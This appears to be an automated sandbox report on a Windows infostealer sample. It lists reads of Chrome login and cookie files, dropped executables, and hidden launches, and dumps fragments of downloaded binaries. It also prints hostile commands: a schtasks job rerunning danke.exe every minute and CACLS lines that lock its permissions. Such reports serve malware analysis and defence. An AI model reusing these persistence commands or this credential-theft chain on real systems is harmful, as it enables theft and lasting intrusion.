GetDiskFreeSpaceW July 24, 2023, 7:34 a.m.	number_of_free_clusters: 3252072 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW July 24, 2023, 7:34 a.m.	number_of_free_clusters: 3252072 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW July 24, 2023, 7:34 a.m.	number_of_free_clusters: 3252004 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW July 24, 2023, 7:34 a.m.	number_of_free_clusters: 3252004 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW July 24, 2023, 7:34 a.m.	number_of_free_clusters: 3250878 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW July 24, 2023, 7:34 a.m.	number_of_free_clusters: 3250878 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW July 24, 2023, 7:34 a.m.	number_of_free_clusters: 3250775 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW July 24, 2023, 7:34 a.m.	number_of_free_clusters: 3250775 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW July 24, 2023, 7:34 a.m.	number_of_free_clusters: 3250511 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW July 24, 2023, 7:34 a.m.	number_of_free_clusters: 3250511 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW July 24, 2023, 7:34 a.m.	number_of_free_clusters: 3250407 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW July 24, 2023, 7:34 a.m.	number_of_free_clusters: 3250407 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1

Steals private information from local Internet browsers (6 events)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State

Creates executable files on the filesystem (21 events)

file	C:\Users\test22\AppData\Local\Temp\IXP003.TMP\n3861378.exe
file	C:\Users\test22\AppData\Local\Temp\IXP005.TMP\outsidevariety.exe
file	C:\Users\test22\AppData\Roaming\006700e5a2ab05\cred64.dll
file	C:\Users\test22\AppData\Local\Temp\1000039051\fotod25.exe
file	C:\Users\test22\AppData\Local\Temp\1000040051\an.exe
file	C:\Users\test22\AppData\Local\Temp\IXP001.TMP\c3584474.exe
file	C:\Users\test22\AppData\Local\Temp\IXP000.TMP\d4057680.exe
file	C:\Users\test22\AppData\Local\Temp\IXP001.TMP\j9687903.exe
file	C:\Users\test22\AppData\Local\Temp\IXP002.TMP\a2860925.exe
file	C:\Users\test22\AppData\Local\Temp\IXP000.TMP\v5161549.exe
file	C:\Users\test22\AppData\Local\Temp\IXP001.TMP\x6412530.exe
file	C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll
file	C:\Users\test22\AppData\Local\Temp\IXP004.TMP\k3151030.exe
file	C:\Users\test22\AppData\Local\Temp\IXP002.TMP\b6900950.exe
file	C:\Users\test22\AppData\Local\Temp\IXP002.TMP\g8876974.exe
file	C:\Users\test22\AppData\Local\Temp\IXP002.TMP\h0247653.exe
file	C:\Users\test22\AppData\Local\Temp\IXP003.TMP\y8069687.exe
file	C:\Users\test22\AppData\Local\Temp\IXP004.TMP\l8349481.exe
file	C:\Users\test22\AppData\Local\Temp\IXP001.TMP\v5218568.exe
file	C:\Users\test22\AppData\Local\Temp\1000038051\foto135.exe
file	C:\Users\test22\AppData\Local\Temp\IXP005.TMP\outsiidevariety.exe

Creates a suspicious process (4 events)

cmdline	C:\Windows\system32\cmd.exe /S /D /c" echo Y"
cmdline	"C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "danke.exe" /P "test22:N"&&CACLS "danke.exe" /P "test22:R" /E&&echo Y\|CACLS "..\3ec1f323b5" /P "test22:N"&&CACLS "..\3ec1f323b5" /P "test22:R" /E&&Exit
cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN danke.exe /TR "C:\Users\test22\AppData\Local\Temp\3ec1f323b5\danke.exe" /F
cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN danke.exe /TR "C:\Users\test22\AppData\Local\Temp\3ec1f323b5\danke.exe" /F

Drops a binary and executes it (4 events)

file	C:\Users\test22\AppData\Local\Temp\3ec1f323b5\danke.exe
file	C:\Users\test22\AppData\Local\Temp\1000038051\foto135.exe
file	C:\Users\test22\AppData\Local\Temp\1000039051\fotod25.exe
file	C:\Users\test22\AppData\Local\Temp\1000040051\an.exe

Drops an executable to the user AppData folder (7 events)

file	C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll
file	C:\Users\test22\AppData\Local\Temp\3ec1f323b5\danke.exe
file	C:\Users\test22\AppData\Local\Temp\1000038051\foto135.exe
file	C:\Users\test22\AppData\Local\Temp\IXP003.TMP\y8069687.exe
file	C:\Users\test22\AppData\Local\Temp\1000039051\fotod25.exe
file	C:\Users\test22\AppData\Local\Temp\IXP003.TMP\n3861378.exe
file	C:\Users\test22\AppData\Local\Temp\IXP005.TMP\outsidevariety.exe

A process created a hidden window (7 events)

Time & API	Arguments	Status	Return
ShellExecuteExW July 24, 2023, 7:34 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\3ec1f323b5\danke.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\3ec1f323b5\danke.exe	1	1
ShellExecuteExW July 24, 2023, 7:34 a.m.	show_type: 0 filepath_r: SCHTASKS parameters: /Create /SC MINUTE /MO 1 /TN danke.exe /TR "C:\Users\test22\AppData\Local\Temp\3ec1f323b5\danke.exe" /F filepath: SCHTASKS	1	1
ShellExecuteExW July 24, 2023, 7:34 a.m.	show_type: 0 filepath_r: cmd parameters: /k echo Y\|CACLS "danke.exe" /P "test22:N"&&CACLS "danke.exe" /P "test22:R" /E&&echo Y\|CACLS "..\3ec1f323b5" /P "test22:N"&&CACLS "..\3ec1f323b5" /P "test22:R" /E&&Exit filepath: cmd	1	1
ShellExecuteExW July 24, 2023, 7:34 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000038051\foto135.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000038051\foto135.exe	1	1
ShellExecuteExW July 24, 2023, 7:34 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000039051\fotod25.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000039051\fotod25.exe	1	1
ShellExecuteExW July 24, 2023, 7:34 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000040051\an.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000040051\an.exe	1	1
ShellExecuteExW July 24, 2023, 7:35 a.m.	show_type: 0 filepath_r: rundll32.exe parameters: C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll, Main filepath: rundll32.exe	1	1

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses July 24, 2023, 7:34 a.m.	flags: 1158 family: 0	1	0	0

An executable file was downloaded by the process danke.exe (4 events)

Time & API	Arguments	Status	Return
InternetReadFile July 24, 2023, 7:34 a.m.	buffer: MZÿÿ¸@àº´ Í!¸LÍ!This program cannot be run in DOS mode. $×â%KÔKÔKÔöåNÕKÔöåHÕKÔöåOÕKÔöåJÕKÔJÔ KÔöåCÕKÔöå´ÔKÔöåIÕKÔRichKÔPELâ`bà d°`j@ pP&@Á ¢´À$`T@ .textcd `.dataHh@À.idataR j@@.rsrc À\|@@.reloc` @B@P@¤@p@¢@È@u j@°i@@o@àÀ012P4ð4BIPJÐJ`KÀK LÀLÐLàOcÀc`g°i j`jàlðn@oppr radvapi32.dllCheckTokenMembership" .INF[]RebootAdvancedINFVersionsetupx.dllsetupapi.dll.BATSeShutdownPrivilegeadvpack.dllDelNodeRunDLL32...wininit.ini%luSoftware\Microsoft\Windows\CurrentVersion\App Paths\Kernel32.dllHeapSetInformationTITLEEXTRACTOPTINSTANCECHECKVERCHECKDecryptFileALICENSE<None>REBOOTSHOWWINDOWADMQCMDUSRQCMDRUNPROGRAMPOSTRUNPROGRAMFINISHMSGLoadString() Error. Could not load string resource.CABINETFILESIZESPACKINSTSPACEUPROMPTIXP%03d.TMPIXPi386mipsalphappcA:\msdownld.tmpTMP4351$.TMPRegServerUPDFILE%luControl Panel\Desktop\ResourceLocaleâ`b%ttâ`b Øâ`bprRSDSºÍã÷æÎÍú1 òïåwextract.pdbGCTL¬.rdata$brc¬.CRT$XCA°.CRT$XCAA´.CRT$XCZ¸.CRT$XIA¼.CRT$XIAAÀ.CRT$XIYÄ.CRT$XIZÈx.gfids@0.rdatap.rdata$sxdatat.rdata$zzzdbg8\.text$mn¸r\.xdata$xà.dataàh.bss .idata$5¢.00cfg¢ .idata$2,£.idata$3@£.idata$4È¥ .idata$6À.rsrc$01Ä .rsrc$02ÿUì3ÀÒtúÿÿÿv¸WÀxQÿuQèÛëÒtÆ]ÂÿUìSVW3ÿ»W÷Òtúÿÿÿvóöx?òÁÒt8t@îuõþÂ÷Þö+Çæ©ÿøó÷ßÿ#øöxQÿu+×QÏènð_Æ^[]ÂÿUìEV3öÀt=ÿÿÿv¾Wöx5S]3öWxÿEPÿuWSÿ\|¢@ÄÀx;Çwuë¾zÆ_[ë ÀtMÆÆ^]ÃÿUìÒt&ESV¾þÿÿ+ÁötÛt ANêuì^[ÒuI÷ÚÆÒâÿøz]ÂÿUì9MrEº+Á;Âw+M ë3À]ÂÿUìì¡@3ÅEüSVW3ÀfÇEøñEôhD@uèØÿx @øÿtjhT@Wÿ @EðÀtP3ÉEìPQQQQQQh j jEôPCÿ$ @ÀtMðôÿuèÿuìjÿ¢@ÿUð;ôt¹Í)ÿuìÿ @Wÿ¬ @MüÃ_^3Í[èATå]ÃÿUìì¡@3ÅEü¡(@SWj3ÛfÇEø_]ô]ð;ÇôMðèÿÿÿÀÓEèPjÿ¡@Pÿ @ÀÉEìPSSWÿuèÿ @Àÿl @øzVÿuìSÿP¡@ðötqEìPÿuìVWÿuèÿ @ÀtTEäPSSSSSSh j WEôPÿ$ @Àt49v'~ÿuäÿ7ÿ, @Àu CÇ;réë3À@£(@Eðÿuäÿ @Vÿ¤ @^ÿuèÿ @EðëEðÀt Ç(@Mü_3Í[èSå]ÃÌÌÌÌÌÌÌÿUìì¡@3ÅEüEVu-t!èuUÃ÷ÿÿùw RVÿà¡@ëP3ÀëOÿÌ¡@ÐÎè)hüýÿÿÆüýÿÿPÿuÿ5<@ÿè¡@üýÿÿPh?VÿÔ¡@jÿÿÜ¡@3À@Mü3Í^èbRå]ÂÿUìQSÁÚVWEü3ÿ0ë>tFf¾ËèÔKÀuëEüf¾0ë3Àë#<7tGf¾7Ëè®KÀté78tÆ@_^[å]ÃÿUìì¡@3ÅEüEºSVÙèùÿÿEôýÿÿWSìùÿÿè[ûÿÿ½ôýÿÿ"u ºl@õýÿÿëºp@ôýÿÿðùÿÿðùÿÿè-ÿÿÿµðùÿÿøöt<ÎQAÀuù+Êùr)F<:u~\t >\u<\uVºøþÿÿèãúÿÿë(Qhä@QºøþÿÿèËûÿÿVºøþÿÿèÃIj.ZÎè÷JÀjÿht@jÿPjjÿh @Hè\|øþÿÿPÿ request_handle: 0x00cc000c	1	1
InternetReadFile July 24, 2023, 7:34 a.m.	buffer: MZÿÿ¸@àº´ Í!¸LÍ!This program cannot be run in DOS mode. $×â%KÔKÔKÔöåNÕKÔöåHÕKÔöåOÕKÔöåJÕKÔJÔ KÔöåCÕKÔöå´ÔKÔöåIÕKÔRichKÔPELâ`bà d²`j@ p-%@Á ¢´À`T@ .textcd `.dataHh@À.idataR j@@.rsrc À\|@@.reloc` @B@P@¤@p@¢@È@u j@°i@@o@àÀ012P4ð4BIPJÐJ`KÀK LÀLÐLàOcÀc`g°i j`jàlðn@oppr radvapi32.dllCheckTokenMembership" .INF[]RebootAdvancedINFVersionsetupx.dllsetupapi.dll.BATSeShutdownPrivilegeadvpack.dllDelNodeRunDLL32...wininit.ini%luSoftware\Microsoft\Windows\CurrentVersion\App Paths\Kernel32.dllHeapSetInformationTITLEEXTRACTOPTINSTANCECHECKVERCHECKDecryptFileALICENSE<None>REBOOTSHOWWINDOWADMQCMDUSRQCMDRUNPROGRAMPOSTRUNPROGRAMFINISHMSGLoadString() Error. Could not load string resource.CABINETFILESIZESPACKINSTSPACEUPROMPTIXP%03d.TMPIXPi386mipsalphappcA:\msdownld.tmpTMP4351$.TMPRegServerUPDFILE%luControl Panel\Desktop\ResourceLocaleâ`b%ttâ`b Øâ`bprRSDSºÍã÷æÎÍú1 òïåwextract.pdbGCTL¬.rdata$brc¬.CRT$XCA°.CRT$XCAA´.CRT$XCZ¸.CRT$XIA¼.CRT$XIAAÀ.CRT$XIYÄ.CRT$XIZÈx.gfids@0.rdatap.rdata$sxdatat.rdata$zzzdbg8\.text$mn¸r\.xdata$xà.dataàh.bss .idata$5¢.00cfg¢ .idata$2,£.idata$3@£.idata$4È¥ .idata$6À.rsrc$01Ä .rsrc$02ÿUì3ÀÒtúÿÿÿv¸WÀxQÿuQèÛëÒtÆ]ÂÿUìSVW3ÿ»W÷Òtúÿÿÿvóöx?òÁÒt8t@îuõþÂ÷Þö+Çæ©ÿøó÷ßÿ#øöxQÿu+×QÏènð_Æ^[]ÂÿUìEV3öÀt=ÿÿÿv¾Wöx5S]3öWxÿEPÿuWSÿ\|¢@ÄÀx;Çwuë¾zÆ_[ë ÀtMÆÆ^]ÃÿUìÒt&ESV¾þÿÿ+ÁötÛt ANêuì^[ÒuI÷ÚÆÒâÿøz]ÂÿUì9MrEº+Á;Âw+M ë3À]ÂÿUìì¡@3ÅEüSVW3ÀfÇEøñEôhD@uèØÿx @øÿtjhT@Wÿ @EðÀtP3ÉEìPQQQQQQh j jEôPCÿ$ @ÀtMðôÿuèÿuìjÿ¢@ÿUð;ôt¹Í)ÿuìÿ @Wÿ¬ @MüÃ_^3Í[èATå]ÃÿUìì¡@3ÅEü¡(@SWj3ÛfÇEø_]ô]ð;ÇôMðèÿÿÿÀÓEèPjÿ¡@Pÿ @ÀÉEìPSSWÿuèÿ @Àÿl @øzVÿuìSÿP¡@ðötqEìPÿuìVWÿuèÿ @ÀtTEäPSSSSSSh j WEôPÿ$ @Àt49v'~ÿuäÿ7ÿ, @Àu CÇ;réë3À@£(@Eðÿuäÿ @Vÿ¤ @^ÿuèÿ @EðëEðÀt Ç(@Mü_3Í[èSå]ÃÌÌÌÌÌÌÌÿUìì¡@3ÅEüEVu-t!èuUÃ÷ÿÿùw RVÿà¡@ëP3ÀëOÿÌ¡@ÐÎè)hüýÿÿÆüýÿÿPÿuÿ5<@ÿè¡@üýÿÿPh?VÿÔ¡@jÿÿÜ¡@3À@Mü3Í^èbRå]ÂÿUìQSÁÚVWEü3ÿ0ë>tFf¾ËèÔKÀuëEüf¾0ë3Àë#<7tGf¾7Ëè®KÀté78tÆ@_^[å]ÃÿUìì¡@3ÅEüEºSVÙèùÿÿEôýÿÿWSìùÿÿè[ûÿÿ½ôýÿÿ"u ºl@õýÿÿëºp@ôýÿÿðùÿÿðùÿÿè-ÿÿÿµðùÿÿøöt<ÎQAÀuù+Êùr)F<:u~\t >\u<\uVºøþÿÿèãúÿÿë(Qhä@QºøþÿÿèËûÿÿVºøþÿÿèÃIj.ZÎè÷JÀjÿht@jÿPjjÿh @Hè\|øþÿÿPÿ request_handle: 0x00cc000c	1	1
InternetReadFile July 24, 2023, 7:34 a.m.	buffer: MZÿÿ¸@èº´ Í!¸LÍ!This program cannot be run in DOS mode. $DØþe¹6¹6¹6Ò7¹6Ò7¹6Ò7¹6Ò7¹6¹6 ¹6Ò7 ¹6Òo6¹6Ò7¹6Rich¹6PEdøÄ®ð"\| @ ð » `Á <¢´ðäæàà T( .text{\| `.rdataÈ"$@@.dataÀ¤@À.pdataà¨@@.rsrcððè®@@.reloc à @BÌÌÌÌÌÌÌÌE3ÉHBÿAºþÿÿA»WI;ÂEGËEÉxGHÒt"L+ÒL+ÁIHÀtAÀtHÿÁHêuäHÒHAÿHEÁH÷ÚEÉA÷ÑAázÆëHÒtÆAÁÃÌÌÌÌÌÌÌÌÌÌE3ÉLÒMØHÑA¸WIBÿH=þÿÿEGÈEÉx5IÊHÂMÒt8t HÿÀHéuòHÁH÷ØEÉA÷ÑE#ÈHÉtMÂL+ÁëE3ÀEÉxXIÊII+Èt.HÁMþÿÿI+ÂLÈL+ÚMÉtAÀtIÿÉHÿÂHéuåHÉHBÿHEÂH÷ÙEÉA÷ÑAázÆAÁÃÌÌÌÌÌÌÌÌÌÌLD$LL$ SVWHì 3ÿHBÿH=þÿÿHñ¹WGùÿx;HZÿHÎHÓLL$X3ÿHÿDÀxHH;Ãwu@<3ë@<3¿zëHÒtÆÇHÄ _^[ÃÌÌÌÌÌÌÌH\$Hl$VWAVHìH ®H3ÄHD$pLñfÇD$l3íH ýl$hHÿDHØHÀHðHÈHÿ.DHðHÀtmHD$`A.HD$PDE l$HHL$hl$@}l$8A¹ l$0²l$(l$ Hÿñ~DÀt$HT$`MÆ3ÉHÆÿµHL$`Hÿ¡~DHËHÿÊDÇHL$pH3Ìè¦qL$I[(Ik0IãA^_^ÃÌÌÌÌÌÌÌÌÌÌHÄHXHpHxLp UHh¡HìHö¬H3ÄHEG-®E3öDu?fÇECDu'A^;ÃHM'èþÿÿÀhHÿDHÈLE/SHÿæ}DÀWHM/HE+E3ÉHD$ E3ÀÓHÿ}DÀHÿY~DøzëU+3ÉHÿDHøHÀÎDM+HE+HM/LÇÓHD$ Hÿ9}DÀHE7A¹ HD$PHM?Dt$HA¸ Dt$@ÓDt$8Dt$0Dt$(Dt$ Hÿ4}DÀtLAöD97v4»HU7ÎHÉHLÏHÿ}DÀuó;7rÜë Î¬]'HM7Hÿ¼\|DHÏHÿÕ}DHM/Hÿ}DE'ë ¬»E'ÀEË ~¬HMGH3ÌèoL$I[IsI{ Ms(Iã]ÃÌÌÌÌÌÌÌÌÌH\$WHì0HôªH3ÄH$ IùIÀHÙêt'úuIÀÃ÷ÿÿIøwHÐHÿôDëh3ÀëiHÿ DHÐHËèú6H ûÈLD$ A¹ÆD$ ×Hÿ¢DLD$ º?HËHÿ±DÉÿHÿD¸H$ H3Ìè nH$HHÄ0_ÃÌÌÌÌÌÌÌH\$Hl$Ht$WHì HHòHù3íë@8+tjHÿÃ¾HÎèÌfHÀuè¾HÎHè¹fHÀuHû?tHÿÇHÎÿÅ¾èfHÀtæHcÅHÃ8tÆHÿÀH\$0Hl$8Ht$@HÄ _ÃÌ3ÀëæÌÌÌÌÌÌÌÌH\$UVWATAUAVAWH¬$úÿÿHìpH^©H3ÄH`LñHEPMÖHMPL+ÐMùE3íMàºHúþÿHÀtA ÀtHÿÁHêuáHÒHAÿHEÁD(}P"u H#HEQëHHEPHL$0HD$0è»þÿÿH\|$0HËÿHðHÿtlHÃHÿÀD8,u÷HørZG±\<:u8Ot8uH:ÁuDHD$@LÇL+ÀHL$@ºHúþÿHÀtAÀtHÿÁHêuáHÒHAÿHEÁD(ëZA¹LY¾HD$@AÑL+ÀHL$@HúþÿHÀtAÀtHÿÁHêuáHÒHAÿLÇAÑHEÁHL$@D(è¤cº.HÏèWeHÀH \$(ºHL$ DËLÀJ~Hÿ¹yDøÎHL$@Hÿ¯yDøÿÁè÷Ðà~HÄ~Ht$0HL$0è]ýÿÿHÈHÀt"D8)H§~HD$0HEÁHL$0HD$0è3ýÿÿº¹@Hÿ{DHØHÀËHt$0H=E¨HÏLL$@HV~D8.HEÎE3ÀHÿyDLËAÇ(¼Lá}HD$@HD$(H ~H )~ÇD$ HÿZyDÀt5 ÅºD8.IÎHEþLÇèöÿÿLD$@ºHËèöÿÿéM%ÙÄûfD9-åÄu%A¸HT$@HL$@L5¼}HÿEzDëL5·}D8.HD$@HD$(L§HEþMÎºH\|$ HËè^÷ÿÿéÞE3ÉLD$@º%Dl$(3ÉÇD$ è¸33Àé¿º.HÏè@cHÀHP}\$(HT$ DËºLÀJ~Hÿ¢wDøukH5Ñ¦HÃHÿÀD8,u÷HL$@HÿÃD8,u÷H<¹@HWHÿ3yDHØHÀuE3ÉºµE3ÀéNÿÿÿLL$@LÆHWHÈèöÿÿé¿¹@×HÿêxDHØHÀt·HL$@HÿwDøÿt}¨uyLD$@×H`L+ÀH`HþûÿHÀtBÀtHÿÁHêuáHÒHAÿHEÁD(HötmD8.thLÙ{H×H`èõÿÿLÆH`H×èõÿÿë>H`L+ðH`HþûÿHÀtB2ÀtHÿÂHïuáHÿHJÿHEÊD)LÃD+HÓH`èI$¸H`H3ÌèhH$¸HÄpA_A^A]A\ request_handle: 0x00cc000c	1	1
InternetReadFile July 24, 2023, 7:35 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $,CyáCyáCyáâ~Iyáä~Ëyáå~Qyáå~Lyáâ~Ryáä~byáà~FyáCyàyáØè~@yáØá~ByáØByáØã~ByáRichCyáPELê¦dà!Þ>ð°@ J<K<øT ?p?@ð,.textVÝÞ `.rdataîaðbâ@@.dataD`D@À.rsrcøP@@.relocTR@Bj h¨<¹phè?#hêèYÃÌÌÌj8hÌ<¹hè#h`êèlYÃÌÌÌj8hÌ<¹ hèÿ"hÀêèLYÃÌÌÌj8hÌ<¹¸hèß"h ëè,YÃÌÌÌj8h=¹Ðhè¿"hëè*YÃÌÌÌj0hD=¹èhè"hàëèì)YÃÌÌÌj0hx=¹iè"h@ìèÌ)YÃÌÌÌhh°=¹iè\"h ìè©)YÃj?h>¹0iè?"híè)YÃÌÌÌÁÂÌÌÌÌÌÌÌÌÌÌÌUìVñWÀFPÇñfÖEÀPèÂ2ÄÆ^]ÂÌÌÌI¸\|<ÉEÁÃÌÌUìVñFÇñPèó2ÄöEtjVè«%ÄÆ^]ÂAÇñPèÉ2YÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌWÀÁfÖAÇA<ÇìñÃÌÌÌÌÌÌÌÌUììMôèÒÿÿÿhJEôPè2ÌÌÌÌUìVñWÀFPÇñfÖEÀPèò1ÄÇìñÆ^]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌUìVñWÀFPÇñfÖEÀPè²1ÄÇ ñÆ^]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌUìQSZVWQSñè=h3É3À}üÛ~53Ò;ÇþEÐ=h¸phCph~r>A}üB;Ë\|Ë~r_ÆÆ^[å]Ã_ÆÆ^[å]ÃÌÌÌÌÌUììSVWòùQ}ôFPEðè3Û]ø9]ð)D~Ær¾Pè¯KÄÀu-NÆùr< tÆùrÏréÌ~Ær=@i3Ò Diÿt+EÿfD]ÿù¸0iC0i8]øtB;×ráÊÿEÈxr3Àÿt.MÿD=Di¹0i]ÿC 0i8]øt@;ÇrÝÈÿ=Di¹0iC 0iMìMôMøyr MøÏ+È 3Ò÷÷Mì}ô MøC]ø;]ðÜþÿÿrÆÇ_^[å]ÃÆÇ_^[å]ÃÌÌÌÌÌÌÌÌÌÌUìì@SVWÙòQMÄ]ôèçýÿÿEÄÖPMÜèYþÿÿhÇCÇCÆè°"Ø¹Èÿ]øûÄó«3Ò¾8>Bú@\|ðUì3ö3Û~øÒtAMø}ðEÜCEÜ¾øÿt'ÁæðÇxÏÆÓøMôPèUìïMøC;ÚrÂEøÀthPèð!ÄUðúr(MÜBÁúrIüÂ#+ÁÀüøwVRQèÀ!ÄUØÇEìÇEðÆEÜúr(MÄBÁúrIüÂ#+ÁÀüøwRQè~!ÄEô_^[å]ÃèGÌÌÌÌÌÌÌÌÌÌÌUìì4E0SVW3ÿÆEè¾À]ÇEàÇEäÆEÐ;Ç´+ÇMÐ;ÃBØ}4E CE SÇPèþr.MèVÁúrIüÂ#+ÁÀüøhRQè× ÄMÐ}Uó~EàEèCU}äuà]f~ÉMèCÁfÖEø;óu\îr; uÀÂîsïþüî: u7þýßH:Ju&þþÎH:Juþÿ½@:B±E0Guü;øõþÿÿ3ÿUþr/MèFÁþrIüÆ#+ÁÀüøVQè UÄEør'HÂùrRüÁ#+ÂÀüøw`QRèÏÄU4ÇEÇEÆEúr3M BÁúrIüÂ#+ÁÀüøwë uüGéWÿÿÿRQèÄÇ_^[å]Ãè Eè«ÌÌÌÌÌÌÌÌÌÌÌUìQS]Vñ]üWjhÀ>ÇFÇFÆèD3ÿÛ~1}ECE8S¿C ú¶È¶ÃGÈ¶ÁÎPèG;}ü\|ÏUúr(MBÁúrIüÂ#+ÁÀüøwRQèÑÄ_Æ^[å]ÃèïDÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌUìì0VWj$hÄ>MÐÇEàÇEäÆEÐèEÀu3öéÇ3ÿÀ¸ÇEøÇEüÆEè;ÇF+Ç¹;ÁBÈ}ECEQÇMèPèBìEÐÌPètìEèôìÌPèaÎèªþÿÿÄè¢üÿÿUüÄ0Àúr,MèBÁúrIüÂ#+ÁÀüø¹RQèÇÄEG;øHÿÿÿ¾Uäúr(MÐBÁúrIüÂ#+ÁÀüøwxRQèÄUúr^MBÁúrFIüÂ#+ÁÀüøwHë4úr(MèBÁúrIüÂ#+ÁÀüøw#RQè1Ä3öétÿÿÿRQè Ä_Æ^å]Ãè?CèJÌÌÌÌÌÌÌÌÌÌUìQEUMVÀS@WPè] ÄM}ØÓCM+ÑID ÿÀuóóNFÀuù+ñFVjÿðVøSWÿðPèÇ5ÄWÿðjÿñÿñWjÿñÿ ñUM_[^úr%BÁúrIüÂ#+ÁÀüøwRQèAÄå]ÃèdBÌÌÌÌUìì$SVWùjÇGÇGÆÿñÀj ÿ$ñØ]üÛlSÿðEôÀSjjjjjÿPjhéýÿððuøö.WN;ÊwOÇrÆëFGÙ+Ú+Â;Øw%ÇOrS4jVèE,ÆÄuøëQSÆEøÏÿuøSè¨]üÇrjjVPjÿÿuô request_handle: 0x00cc0018	1	1

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x00078200', u'virtual_address': u'0x0000c000', u'entropy': 7.874275641140964, u'name': u'.rsrc', u'virtual_size': u'0x00079000'}

entropy

7.87427564114

description

A section with a high entropy has been found

entropy

0.936647173489

description

Overall entropy of this PE file is high

Checks for the Locally Unique Identifier on the system for a suspicious privilege (5 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW July 24, 2023, 7:27 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW July 24, 2023, 7:34 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW July 24, 2023, 7:27 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW July 24, 2023, 7:27 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW July 24, 2023, 7:35 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1

Queries for potentially installed applications (50 out of 78 events)

Time & API	Arguments	Status
RegOpenKeyExW July 24, 2023, 7:34 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x000002c0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	1
RegOpenKeyExW July 24, 2023, 7:34 a.m.	regkey_r: AddressBook base_handle: 0x000002c0 key_handle: 0x0000028c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook	1
RegOpenKeyExW July 24, 2023, 7:34 a.m.	regkey_r: Connection Manager base_handle: 0x000002c0 key_handle: 0x0000028c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager	1
RegOpenKeyExW July 24, 2023, 7:34 a.m.	regkey_r: DirectDrawEx base_handle: 0x000002c0 key_handle: 0x0000028c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx	1
RegOpenKeyExW July 24, 2023, 7:34 a.m.	regkey_r: EditPlus base_handle: 0x000002c0 key_handle: 0x0000028c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus	1
RegOpenKeyExW July 24, 2023, 7:34 a.m.	regkey_r: ENTERPRISE base_handle: 0x000002c0 key_handle: 0x0000028c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE	1
